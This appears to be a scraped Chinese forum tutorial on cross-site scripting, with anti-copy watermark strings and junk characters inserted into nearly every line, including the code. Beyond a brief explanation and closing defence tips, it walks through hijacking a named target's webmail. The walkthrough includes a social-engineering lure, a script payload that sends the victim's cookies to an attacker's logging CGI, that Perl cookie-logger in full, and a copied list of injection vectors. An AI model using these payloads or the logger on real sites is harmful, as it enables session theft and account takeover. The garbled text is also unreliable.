it520

随着网络应用的普及，跨站脚本攻击漏洞经常在一些安全站点发布，这里笔者将整理一些对XSS跨站挂马的一些看法，错误之处请多指点。www.520diannao.com1 p+ r# p( Z6 P1 A( D5 O/ j

- _" D" E8 S, }, C! z打造最好的电脑自学交流论坛　　什么是跨站脚本(XSS)？
. `0 A& f' g* T, f9 ^6 m/ f电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
+ q  i, V7 S, t* X' Q我爱电脑技术社区--打造最好的电脑技术自学交流平台　　所谓跨站脚本攻击是指在远程WEB页面的html代码中插入具有恶意目的代码，用户误认为该页面是可信赖的，当用户打开该页面，浏览器会自动下载恶意代码，运行其中的脚本。通常跨站脚本被称为"XSS"，这是为了与样式表"CSS"进行区分所形成的习惯，所以当你听某人提到CSS或者XSS安全漏洞时，通常指得是跨站脚本攻击。
1 t0 R: b9 e* Z2 \6 o我爱电脑技术社区--打造最好的电脑技术自学交流平台
4 L, c$ a0 w: i5 T4 zwww.520diannao.com　　XSS与脚本注射的区别？
/ t3 f* @( @3 _( h/ j: d我爱电脑技术论坛电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站- b. @+ G7 M* d' v5 L
　　在开始XSS之前，我们需要明白并非所有在网页中插入利用脚本的攻击都被称为XSS。脚本注入是我们常见的另外一种情形，他们的区别在以下两点：
2 e. \; B" e' d" g0 L/ C" k打造最好的电脑自学交流论坛
7 O* O% _: s  t! O　　1、脚本注入攻击会将攻击者插入的脚本保存在远程WEB页面里，如SQL注入、XPath注入。我爱电脑技术论坛  R: e) J4 F2 p
我爱电脑技术社区--打造最好的电脑技术自学交流平台$ n. b" |8 D2 c* {( q
　　2、跨站脚本攻击相对注入脚本攻击是临时的行为，执行后便从页面中消失。9 s$ |1 ^2 g; h1 J/ ^5 L8 ?
3 w+ \2 q. B& c
　　常见的可被插入脚本的网页有以下几种：
1 m( B$ y( q- ]1 a6 W电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站+ h* Q+ E* ~3 R* S% F' q8 j4 f
      HTML
' p0 t/ G% \2 A# V; w- t我爱电脑技术论坛　　JavaScript (本文讨论) ! m; M8 H& a+ A5 G
　　VBScript
1 f7 `' ]" E% c% z/ N我爱电脑技术论坛　　ActiveX ( _5 ?7 N3 x$ q: U/ M3 y
　　Flash
+ K0 C7 n; q& a2 U0 t& G7 D3 N打造最好的电脑自学交流论坛电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站, ?; I. z( N, n( y' f  {9 G1 z
我爱电脑技术社区--打造最好的电脑技术自学交流平台2 z5 d7 D3 q) x! n) w
　　浅析XSS漏洞
3 D9 F6 b! E0 }  x) W; a3 S/ d打造最好的电脑自学交流论坛
" ]' d. O" t4 o1 ^/ y, u电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站　　许多cgi/php脚本执行时，如果它发现客户提交的请求页面并不存在或有其他类型的错误时，出错信息会通过一个显示错误内容的html页面发送到给访问者。例如： 404错误，提示页面不存在。
7 s( S" u9 t" z# M9 |www.520diannao.com
" p7 f" [2 i/ u5 t4 O' C我爱电脑技术论坛　　我们一般对这样的信息不会注意，但是现在要研究CSS漏洞的成因，我们还是仔细看一下。我爱电脑技术社区--打造最好的电脑技术自学交流平台+ `' P) F) I3 `, ^- N7 h
. f/ B- i- u9 W# I+ L& f
　　例：www.somesite.tld/cgi-bin/program.cgi?page=downloads.html+ O3 v2 A7 S1 ~/ f; |2 o

4 D1 a+ K: O4 j5 W我爱电脑技术社区--打造最好的电脑技术自学交流平台　　该URL指向的连接是有效的，但是如果我们把后面的downloads.html替换成brainrawt_owns_ me.html，一个包含404错误信息的页面将反馈给访问者的浏览器。这里我们需要思考，错误信息是如何写入到html文件里呢?
$ j' t) p/ M2 D* \打造最好的电脑自学交流论坛
8 p. m# K3 v* j# C0 L2 u2 G打造最好的电脑自学交流论坛　　注意：下面仅仅是一个例子，该页面存在XSS漏洞，我们可以插入一些Javascript代码到页面里。电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站1 y+ D0 @: @3 P; r% @+ _

' k8 d0 s: |/ m5 ]; _( K& }+ L* p电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站　　当我们提交这个URL的时候，在我们的浏览器中弹出一个消息框，"XSS_Vuln_Testing"。
7 j. o' \6 I  g电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站我爱电脑技术论坛+ y5 @" S6 b" O, [
　　这个例子只是一个XSS漏洞的简单演示，并无实际意义，只用以说明问题所在。
6 J! f  C4 V# R& }$ j4 C" L2 C+ G我爱电脑技术社区--打造最好的电脑技术自学交流平台我爱电脑技术社区--打造最好的电脑技术自学交流平台7 F5 g  r/ {# M3 i% V" l% _: U3 W  \
　　下面我们分析一下造成该运行结果的原因，program.cgi对我们的输入没有经过有效过滤处理，就直接写入404错误页面中，结果创建了一个页面，如下：
2 I) O6 {* e$ D- ^* ~0 u) ]www.520diannao.com电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站6 |" X, j2 r; f0 u; K
<html>
# f" B3 o) a6 [4 l. R! \www.520diannao.com<b>404</b> - <script>alert(’XSS_Vuln_Testing’)</script> Not Found!
' p5 I' I5 q! k</html> www.520diannao.com- Q+ z* G0 }9 h! D- b
/ n/ _" G4 [" d

8 y" V& C" R3 `& m4 g- K! K我爱电脑技术社区--打造最好的电脑技术自学交流平台
- x7 _" b% F: n9 n, \www.520diannao.com　　其中的javascript脚本通过浏览器解释执行，然后就出现了你所看到的结果。我爱电脑技术社区--打造最好的电脑技术自学交流平台- G  ~5 x1 Y6 j% }0 D3 _: h6 _3 Y4 t

' t- M( d# |1 k$ o! Mwww.520diannao.com利用XSS
% y" |9 i+ q" E" G电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
9 w" W1 r9 g1 v* P0 ?我爱电脑技术论坛　　如同前面所提到，如果用户提交的请求不能得到满足，那么服务器端脚本会把输入信息写入一个html文件，当服务器端程序对写入html文件的数据没有进行有效过滤，恶意脚本就可以插入到该html页面中。其他用户浏览该连接的时候脚本将通过客户端浏览器解释执行。打造最好的电脑自学交流论坛. r4 n$ |( R% V* L/ k! }

) P/ D. L7 R' E1 m电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站　　

it520

实例：
' e! O( v- D* W) p电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站. q; V7 e4 i$ y. Z
　　假设你发现myemailserver.tld有CSS漏洞，你想要获得其中一个人的email帐号，比如我们的目标是A。
# ^. m1 k; e3 d8 ?. l+ Rwww.520diannao.com我爱电脑技术社区--打造最好的电脑技术自学交流平台1 m6 u3 m. U* o* z+ e( }
　　已知某存在XSS漏洞的URL www.myemailserver.tld/cgi-bin/news.cgi?article=59035
. k: Z( q% \1 y我爱电脑技术社区--打造最好的电脑技术自学交流平台
1 c( f- E1 D: C" b% G3 n　　接修URL如下：
  M; a7 v/ D1 B, a3 }8 k, x我爱电脑技术社区--打造最好的电脑技术自学交流平台
* b7 r5 l. X) s　　www.myemailserver.tld/cgi-bin/news.cgi?article=hax0redwww.520diannao.com: _! r+ _( @" I; `
我爱电脑技术论坛+ ]6 m  B  f9 E9 L
　　这会创建了一个错误页面，我们得到如下信息：Invalid Input! [article=hax0red] www.520diannao.com% w7 M! \: A$ k8 B/ l- E0 ?- j

8 f! Z/ b3 J/ d. B: g我爱电脑技术论坛
+ M" |/ j, \# g+ _* Q- P% A　　当插入下面这样的javascript代码时，你的屏幕上会弹出一个包含test的消息框。
/ r, s- }% s/ r0 h5 H  ]
& o- m5 m3 K3 Z0 F0 k- m- `# s打造最好的电脑自学交流论坛www.myemailserver.tld/cgi-bin/news.cgi?article=<script>alert(’test’)</script>  电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站$ W1 }1 d+ {7 `! q" B

: K4 I0 p% Z$ C# y& ]( f0 c打造最好的电脑自学交流论坛打造最好的电脑自学交流论坛+ }$ Q0 [& I8 c5 Q- F/ A
　　<script>并没有打印到屏幕上，它是隐藏在背后执行，由于服务器端程序并没有对<script>alert(’test’)</script> 进行有效过滤，所以在页面发回到浏览器并执行了该脚本。
3 ]& Q/ k" ~% c  V9 d( I我爱电脑技术论坛
+ @, c  v4 |* _4 V  p9 p) P, l电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站　　下面我们瞧瞧如何利用该漏洞入侵A的邮箱，首先你必须知道A的email地址，并了解cookies的作用。那么我们可以给A发送一个恶意连接，来从A机器中的cookie信息里获得有价值的信息。这里我们会利用到一些基本的社会工程欺骗，想办法让A访问myemailserver.tld站点发表的文章，如，“亲爱的A，美女图片快来欣赏?”
: B5 ~3 N! a0 i0 m" O) e; X打造最好的电脑自学交流论坛
9 Q5 e" h! u' P1 m我爱电脑技术论坛　　那么当A访问 www.myemailserver.tld/cgi-bin/news.cgi?article= 连接时，A本地的cookie就会被攻击者截获。电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站* |1 s, D$ Z' p9 a" d3 h( `

) y' [2 V% d2 B7 C  i我爱电脑技术论坛　　当然还可以通过伪装email服务器的登陆页面，挂到其他的系统上，诱使用户登陆恶意系统页面，最终获取对方身份信息。总之，这里需要一些社会工程学欺骗，要耐心。
" F) k5 g6 W' J$ @打造最好的电脑自学交流论坛" H8 Q+ _6 g5 e: c* {- @( h! H
　　把javascript脚本插入WEB页面的不同方法：我爱电脑技术论坛) D. `% @! g( p/ g  Y$ o$ q* m
4 z, H( l, E# O) `. Y! V7 a* Y) T
<snip>  电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站+ B7 \  S: T) B! ^2 v& v
copy from：GOBBLES SECURITY ADVISORY #33  我爱电脑技术社区--打造最好的电脑技术自学交流平台, I" C/ n) u, A( S3 f
Here is a cut-n-paste collection of typical JavaScript-injection hacks  打造最好的电脑自学交流论坛- o- Y9 Y7 M6 ~9 j% }0 d7 L% w
you may derive some glee from playing with.  
# i) g; O1 x, A打造最好的电脑自学交流论坛, [6 [+ z& K- a
  <a href="javascript#[code]">  
7 L1 K& Z, [6 o. p: m$ G4 p我爱电脑技术社区--打造最好的电脑技术自学交流平台  <div onmouseover="[code]">  电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站3 `9 W) o9 |$ p1 j
  <img src="javascript:[code]">  
) d) ?3 B5 [6 F" F6 X+ t7 I7 {( n9 d5 v  <img dynsrc="javascript:[code]"> [IE]  
- t  r8 I5 ?: z/ A& [电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站  <input type="image" dynsrc="javascript:[code]"> [IE]  电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站% I3 o) t9 ]4 A+ `
  <bgsound src="javascript:[code]"> [IE]  www.520diannao.com# F6 C- w) x% p7 J8 m
  &<script>[code]</script>  
) {1 ?; n0 B9 d  &{[code]}; [N4]  我爱电脑技术论坛' _$ K+ \- V: i- ]3 ]% ]+ G
  <img src=&{[code]};> [N4]  
( E, J" g1 C% i6 A$ t; r% x; [打造最好的电脑自学交流论坛  <link rel="stylesheet" href="javascript:[code]">  电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站' R  n7 u4 p* n% ~
  <iframe src="vbscript:[code]"> [IE]  % }. V9 L+ P$ F* f% `% j. C! H
  <img src="mocha:[code]"> [N4]  
+ g) d- c, y3 r电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站  <img src="livescript:[code]"> [N4]  
& L  t& y& _  e2 O" F" F5 h  <a href="about:<script>[code]</script>">  我爱电脑技术社区--打造最好的电脑技术自学交流平台! d0 `+ x; w* |5 [8 a2 R+ I4 o) M% I
  <meta http-equiv="refresh" content="0;url=javascript:[code]">  
) W: @. }; n+ K! l8 p/ k$ Uwww.520diannao.com  <body onload="[code]">  
3 g( ^4 |, t# k$ g" j我爱电脑技术论坛  <div style="background-image: url(javascript:[code]);">  打造最好的电脑自学交流论坛2 P1 N+ R% e( g& u+ T7 b5 }, z
  <div style="behaviour: url([link to code]);"> [IE]  
. j7 V# e) j0 I$ C& v  Y! M2 ]5 V  <div style="binding: url([link to code]);"> [Mozilla]  打造最好的电脑自学交流论坛' E( q9 ^0 N/ \- {& P
  <div style="width: expression([code]);"> [IE]  
$ g7 T# d5 r0 Ywww.520diannao.com  <style type="text/javascript">[code]</style> [N4]  
( N/ o# l# {5 |电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站  <object classid="clsid:..." codebase="javascript:[code]"> [IE]  打造最好的电脑自学交流论坛/ W4 a' P0 C! t' E1 Q
  <style><!--</style><script>[code]//--></script>  
9 i0 t6 z7 [  q+ l3 W1 L, n4 R电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站  <![CDATA[<!--]]><script>[code]//--></script>  
1 d0 q" e- ]4 W' \: S/ W打造最好的电脑自学交流论坛  <!-- -- --><script>[code]</script><!-- -- -->  
, g6 w. D3 k' h! O8 g2 _3 swww.520diannao.com  <script>[code]</script>  
; ]2 a7 M3 H% M& _! \9 Y  <img src="blah"onmouseover="[code]">  
1 a$ ?. S# U; }+ Y电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站  <img src="blah>" onmouseover="[code]">    S5 r- R0 L9 E2 o1 ^8 `# e
  <xml src="javascript:[code]">  
& k- P2 J  e: n. Y# {+ X" n7 p我爱电脑技术社区--打造最好的电脑技术自学交流平台  <xml id="X"><a><b><script>[code]</script>;</b></a></xml>  
0 [" u8 V& E; K; h* b我爱电脑技术论坛  <div datafld="b" dataformatas="html" datasrc="#X"></div>  
" [! z) W$ i. C( L" T, N1 V  [\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]  $ W9 U' W; [' b2 Q) M
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站7 N& [" y$ e; S' v
----Copied from GOBBLES SECURITY ADVISORY #33----  电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站7 F- j, G0 @: A8 U' I6 l0 K1 O0 O& B; E
</snip>  我爱电脑技术社区--打造最好的电脑技术自学交流平台0 i; G! X8 C$ q# n( ?" @
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站  ~8 o/ o; f( ?- H, p2 A

& [: R; R- q  _* I; n! y+ o1 E我爱电脑技术社区--打造最好的电脑技术自学交流平台　　获取cookie并且做记录实例：
1 D# F% M) v, d1 |打造最好的电脑自学交流论坛我爱电脑技术社区--打造最好的电脑技术自学交流平台6 {! S; l+ H$ S; }; V
　　注意：要使它工作，你的浏览器必须允许接受http://website.tld站点发送的cookies，使用javascript创建访问者的cookies，javascript脚本放在index.html文件中。
- Y9 E: F( O. S  g9 c9 X9 t我爱电脑技术论坛
- [+ }/ N8 r6 |9 q  i打造最好的电脑自学交流论坛　　假设http://website.tld存在XSS攻击的安全隐患，存在漏洞的连接是：- u$ l: |9 J9 \% I

1 M" @9 i% ~" x8 n( W3 F* T　　http://website.tld/program.cgi?input=<恶意javascript>
% t" d& S9 w, _& e  K1 ~( L打造最好的电脑自学交流论坛
$ ^) I. V/ z. a　　我们创建这样一个连接：www.520diannao.com  _5 U" n0 d2 }% T) k% p, e2 R5 ~

7 {, k, ^; e. z" R, n我爱电脑技术论坛http://website.tld/program.cgi?input=<script>document.location=’http://yoursite.tld/cgi-bin/evil_cookie_logger.cgi?’+document.cookie</script>  
$ V; Z& O" X* O) [电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
' g. b/ ~9 K3 d& E  L/ V我爱电脑技术社区--打造最好的电脑技术自学交流平台我爱电脑技术社区--打造最好的电脑技术自学交流平台- d& _: q5 t! ^; i. g) s
　　然后让保存该站点cookie的用户访问这个连接：
5 y3 d# X! I; U, i电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
) Q$ @; @. h/ W' N2 O我爱电脑技术社区--打造最好的电脑技术自学交流平台　　这是我们的CGI脚本，它的作用就是对用户cookie做记录：　我爱电脑技术论坛: h8 V& C% J0 Z* v  L$ ~! @

) z) {* Q% e( }2 H- W+ V& [8 w打造最好的电脑自学交流论坛---------evil_cookie_logger.cgi----------- 打造最好的电脑自学交流论坛( I" f% z9 Y- d. o7 G" N
#!/usr/bin/perl  , G; P* ^0 o7 A3 ?
# evil_cookie_logger.cgi  我爱电脑技术论坛: ~* T+ H/ H- [
# remote cookie logging CGI coded by BrainRawt  
, J; G5 Y1 c- v& c& p( o#  
$ O! {+ c4 ~( \/ C9 x电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站# NOTE: coded as a proof of concept script when testing for  
  ~& L6 K8 Y; n1 x电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站#      cross-site scripting vulnerabilities.  电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站" H2 q+ F4 ^; x8 d7 B3 P

" }' s# O' Q' z& ]: i电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站$borrowed_info = $ENV{’QUERY_STRING’};  
' w9 f: w: K' _2 e) C我爱电脑技术论坛$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;  我爱电脑技术社区--打造最好的电脑技术自学交流平台8 ^( o  F  |; h8 g
( q2 Q1 h: D* G8 z. g+ ~* @
open(EVIL_COOKIE_LOG, ">>evil_cookie_log") or print "Content-type:  我爱电脑技术论坛) {! h0 p3 V& A5 U) G- v3 f2 Q
text/html\n\n something went wrong\n";  
( l* F& \* }9 C! U$ w我爱电脑技术社区--打造最好的电脑技术自学交流平台  print EVIL_COOKIE_LOG "$borrowed_info\n";  
/ ]2 y0 M' M- z0 G% ?- o- u, O我爱电脑技术论坛  print "Content-type: text/html\n\n";  
6 @6 \0 z0 e/ y' w" Cwww.520diannao.comclose(EVIL_COOKIE_LOG);  我爱电脑技术论坛7 v' M# C/ Y7 d% @) B
------------------------------------------ 打造最好的电脑自学交流论坛; O# ]7 l$ [8 }" k7 ]3 p# k* R
+ ?" |0 y& y+ U/ e  G" {
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站# {/ i( `" }6 m5 B0 n& O  `/ s
　　该脚本首先通过 $ENV{’QUERY_STRING’}获得cookie，打印到$borrowed_info变量里，通过open(EVIL_COOKIE_LOG, ">>evil_cookie_log")，把cookie信息保存到evil_cookie_log文件。- k2 C. N# j' p0 q( y# m
打造最好的电脑自学交流论坛) a6 S3 h4 Y9 x$ |! I
　　注意：上面的脚本，可能在一些浏览器或者站点上不能执行，用户需要根据自己的情况进行修改。
2 y, g6 q# V( ?: ]电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站打造最好的电脑自学交流论坛9 N& A, m& t% I& \( C; H& X
如何防范XSS攻击?www.520diannao.com, k! Q( e0 V6 ]/ ?: v
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站0 a# f  m& D+ C
　　1、在WEB浏览器上禁用javascript脚本% e, g2 ?! B. W. q) c% l( D3 W0 H

0 j7 u9 f, u. E. {www.520diannao.com　　2、开发者要仔细审核代码，对提交输入数据进行有效检查，如"<"和">"，可以把"<"，">"转换为<，>
. L* ]9 `% V4 Q* j! d) ]0 N我爱电脑技术论坛
! o* f/ i. M# l. [我爱电脑技术社区--打造最好的电脑技术自学交流平台　　注意：由于XSS漏洞可被利用的多样性，程序员自己要明白具体需要过滤的字符，这主要依赖于所开发程序的作用，建议过滤掉所有元字符，包括"="。我爱电脑技术论坛$ b- x: r. o! G4 _2 }7 n

+ W& j4 J  Y2 [# f, d  Z$ p8 y我爱电脑技术社区--打造最好的电脑技术自学交流平台　　对受害者来说不要访问包含<script>字符的连接，通常正规可信的URL不会包括任何脚本元素。 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站# p7 f2 E- |0 \" l8 u5 t
" \- K3 `% t4 e4 F
      补充：现已存在利用XSS漏洞挂马现象，用户及网站管理员需警惕。